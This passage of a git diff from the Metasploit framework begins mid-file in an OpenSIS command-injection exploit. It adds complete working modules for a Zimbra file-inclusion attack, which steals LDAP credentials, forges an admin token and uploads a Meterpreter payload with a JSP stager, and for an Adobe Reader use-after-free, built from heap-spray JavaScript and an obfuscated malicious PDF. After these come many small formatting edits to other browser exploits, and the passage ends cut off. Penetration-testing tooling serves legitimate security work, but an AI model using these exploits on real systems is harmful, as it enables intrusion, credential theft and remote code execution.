2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI for OpenSIS', '/opensis/']), + OptString.new('USERNAME', [true, 'The username for OpenSIS']), + OptString.new('PASSWORD', [true, 'The password for OpenSIS']) + ], self.class) + end + + # + # Login + # + def login(user, pass) + @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" + print_status("#{peer} - Authenticating as user '#{user}'") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "index.php"), + 'cookie' => @cookie, + 'vars_post' => Hash[{ + 'USERNAME' => user, + 'PASSWORD' => pass, + }.to_a.shuffle] + }) + if res and res.code == 200 and res.body =~ /Portal\.php/ + print_good("#{peer} - Authenticated as user '#{user}'") + return true + else + print_error("#{peer} - Authenticating as user '#{user}' failed") + return false + end + end + + # + # Send command for execution + # + def execute_command(cmd, opts = { :php_function => 'system' } ) + code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) + junk = rand_text_alphanumeric(rand(10)+6) + print_status("#{peer} - Sending payload (#{code.length} bytes)") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ajax.php'), + 'cookie' => @cookie, + 'vars_post' => { + 'modname' => "#{junk}?#{junk}=#{junk}';#{opts[:php_function]}(base64_decode('#{code}'));//" + } + }) + return res + end + + # + # Check credentials are valid and confirm command execution + # + def check + return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) + fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) + print_status("#{peer} - Sending check") + res = execute_command("echo #{fingerprint}") + if res and res.body =~ /align=center>#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + elsif res + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Unknown + end + + def exploit + return unless login(datastore['USERNAME'], datastore['PASSWORD']) + php_function = [ + 'exec', + 'shell_exec', + 'passthru', + 'system' + ].sample + res = execute_command(payload.encoded, { :php_function => php_function }) + if res and res.code == 200 and res.body =~ /hacking_log/i + print_good("#{peer} - Payload sent successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") + end + end +end + +# +# Source +# +=begin ajax.php +90: if(strpos($_REQUEST['modname'],'?')!==false) +91: { +92: $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1)); +93: $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?')); +94: +95: $vars = explode('?',$vars); +96: foreach($vars as $code) +97: { +98: $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';"); +99: eval($code); +100: } +101: } +=end diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb new file mode 100644 index 0000000000..85800e522e --- /dev/null +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -0,0 +1,285 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include REXML + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Zimbra Collaboration Server LFI', + 'Description' => %q{ + This module exploits a local file inclusion on Zimbra 8.0.2 and 7.2.2. The vulnerability + allows an attacker to get the LDAP credentials from the localconfig.xml file. The stolen + credentials allow the attacker to make requests to the service/admin/soap API. This can + then be used to create an authentication token for the admin web interface. This access + can be used to achieve remote code execution. This module has been tested on Zimbra + Collaboration Server 8.0.2 with Ubuntu Server 12.04. + }, + 'Author' => + [ + 'rubina119', # Vulnerability discovery + 'Mekanismen ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-7091' ], + [ 'OSVDB', '100747' ], + [ 'BID', '64149' ], + [ 'EDB', '30085' ], + [ 'URL', 'http://cxsecurity.com/issue/WLB-2013120097' ] + ], + 'Privileged' => false, + 'Platform' => ['linux'], + 'Targets' => + [ + [ 'Zimbra 8.0.2 / Linux', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => "Dec 06 2013" + )) + register_options( + [ + Opt::RPORT(7071), + OptString.new('TARGETURI', [true, 'Path to zimbraAdmin web application', '/zimbraAdmin']), + OptInt.new('DEPTH', [true, 'Traversal depth until to reach the root path', 9]), + OptString.new('ZIMBRADIR', [true, 'Zimbra installation path on the target filesystem (/opt/zimbra by default)', '/opt/zimbra']) + ]) + end + + def check + res = send_traversal_query(traversal_path("conf/localconfig.xml")) + + unless res and res.code == 200 + return Exploit::CheckCode::Safe + end + + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + print_status("#{peer} - Getting login credentials...") + res = send_traversal_query(traversal_path("conf/localconfig.xml")) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL") + end + + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body.to_s + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + zimbra_user = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + if text =~ /name=\\"zimbra_ldap_password\\">";\sa\["(.*)<\/value>/ + zimbra_pass = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + print_good("#{peer} - Got login credentials!") + print_status("#{peer} - Getting auth token...") + + soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy + + res = send_request_cgi({ + 'uri' => normalize_uri("service", "admin", "soap"), + 'method' => 'POST', + 'ctype' => 'application/soap+xml; charset="utf-8"', + 'headers' => + { + 'SOAPAction' => '"urn:zimbraAdmin#AuthRequest"', + }, + 'data' => soap_req + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access service URL") + end + + if res.body.to_s =~ /(.*)<\/authToken>/ + auth_token = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get auth token") + end + + @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" + print_good("#{peer} - Got auth token!") + + #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler + #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ + #the intent is for a ZCO file, whatever that is. However any file will do and it's placed in /downloads/ which we can reach, how handy! + + #push our meterpreter and then a stager jsp file that sets correct permissions, executes the meterpreter and removes itself afterwards + payload_name = rand_text_alpha(8+rand(8)) + stager_name = rand_text_alpha(8+rand(8)) + ".jsp" + + stager = gen_stager(payload_name) + payload_elf = generate_payload_exe + + #upload payload + print_status("#{peer} - Uploading payload") + res = upload_file(payload_name, payload_elf) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to get upload payload") + end + + #upload jsp stager + print_status("#{peer} - Uploading jsp stager") + res = upload_file(stager_name, stager) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") + end + + register_files_for_cleanup( + "../jetty/webapps/zimbra/downloads/#{stager_name}", + "../jetty/webapps/zimbra/downloads/#{payload_name}" + ) + + print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + + res = send_request_cgi({ + 'uri' => normalize_uri("downloads", stager_name), + 'method' => 'GET', + }) + end + + def traversal_path(file_name) + ::File.join( + "../" * datastore['DEPTH'], + datastore['ZIMBRADIR'], + file_name + ) + end + + def send_traversal_query(traversal) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "res", "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => { + 'v' => "091214175450", + 'skin' => "#{traversal}%00" + } + }) + + return res + end + + def upload_file(file_name, data) + req_id = rand_text_numeric(2).to_s + + post_data = Rex::MIME::Message.new + post_data.add_part("#{file_name}", nil, nil, "form-data; name=\"filename1\"") + post_data.add_part("#{data}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"") + post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"") + + n_data = post_data.to_s + n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'uri' => normalize_uri("service", "extension", "clientUploader", "upload"), + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => n_data, + 'cookie' => @cookie + }) + + return res + end + + def build_soap_req(zimbra_user, zimbra_pass) + xml = Document.new + soap_var = "ns1:AuthRequest" + + xml.add_element( + "soapenv:Envelope", + { + 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", + 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", + 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", + 'xmlns:ser' => "http://service.emulation.ws.mercury.com", + 'xmlns:env' => "http://www.w3.org/2003/05/soap-envelope", + 'xmlns:ns1' => "urn:zimbraAdmin", + 'xmlns:ns2' => "urn:zimbraAdmin", + }) + + xml.root.add_element("soapenv:Header") + xml.root.add_element("soapenv:Body") + + header = xml.root.elements[1] + body = xml.root.elements[2] + + header.add_element("ns2:context") + body.add_element("ns1:AuthRequest") + + ns1 = body.elements[1] + ns1.add_element( + "account", + { + 'by' => "name" + }) + + ns1.add_element("password") + + ns1.elements["account"].text = "#{zimbra_user}" + ns1.elements["password"].text = "#{zimbra_pass}" + + return xml.to_s + end + + def gen_stager(payload_name) + stager = "<%@ page import=\"java.util.*,java.io.*\"%>" + stager += " <%" + stager += " String uri = request.getRequestURI();" + stager += " String filename = uri.substring(uri.lastIndexOf(\"/\")+1);" + stager += " String jspfile = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/\" + filename;" + stager += " String payload = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/#{payload_name}\";" + stager += " Process p = Runtime.getRuntime().exec(\"chmod 700 \" + payload);" + stager += " p.waitFor();" + stager += " p = Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");" + stager += "%>" + + return stager + end +end diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 36fe557ff0..f9273b9133 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -263,7 +263,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index fabff8d451..6dd812a159 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index cf095c2b3b..e36cc12fe3 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -415,7 +415,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 2190b3c32b..3d433d9984 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index 3d9314b2b9..fde7448c30 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name} HTML") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 97bc8ef0e3..a491d05fd8 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending HTML to...") send_response(cli, html, {'Content-Type' => "text/html"} ) diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb new file mode 100644 index 0000000000..5432fbf4f3 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -0,0 +1,354 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Reader ToolButton Use After Free", + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in + November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order + to exploit Adobe Reader 9 the fileformat version of the exploit can be used. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :os_flavor => Msf::OperatingSystems::WindowsVersions::XP, + :ua_name => Msf::HttpClients::IE + }, + 'Targets' => + [ + [ 'Windows XP / IE / Adobe Reader 10/11', { } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 08 2013", + 'DefaultTarget' => 0)) + + end + + def on_request_exploit(cli, request, target_info) + print_status("request: #{request.uri}") + js_data = make_js(cli, target_info) + # Create the pdf + pdf = make_pdf(js_data) + print_status("Sending PDF...") + send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) + end + + def make_js(cli, target_info) + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; + bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + + EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end + diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb index ebd3b3c1d1..10af9660df 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb @@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote | - html.gsub(/^\t\t/, '') + html.gsub(/^ {4}/, '') end diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 65a6251378..28b8003a0a 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Clear the extra tabs - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') print_status("Sending exploit HTML") send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 565059f26a..6f6f1a828b 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote MYHTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 0c71156b21..98caf4c686 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -429,7 +429,7 @@ class Metasploit3 < Msf::Exploit::Remote MYHTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 252215eb26..f5b75ab4bf 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name} HTML") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index 23afc5aff9..0f8dff21d5 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index 58a79b93fe..3a1a2953dc 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -306,7 +306,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 736ac1c5c6..b136a41c9f 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -262,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index 1c0033be6d..2a9cfd1ae2 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -248,7 +248,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index ecb5423b03..f6a01d021d 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote send_not_found(cli) return end - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index 90a3207018..c85c94dcc8 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -375,7 +375,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index dd02a89eb9..c841580762 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git 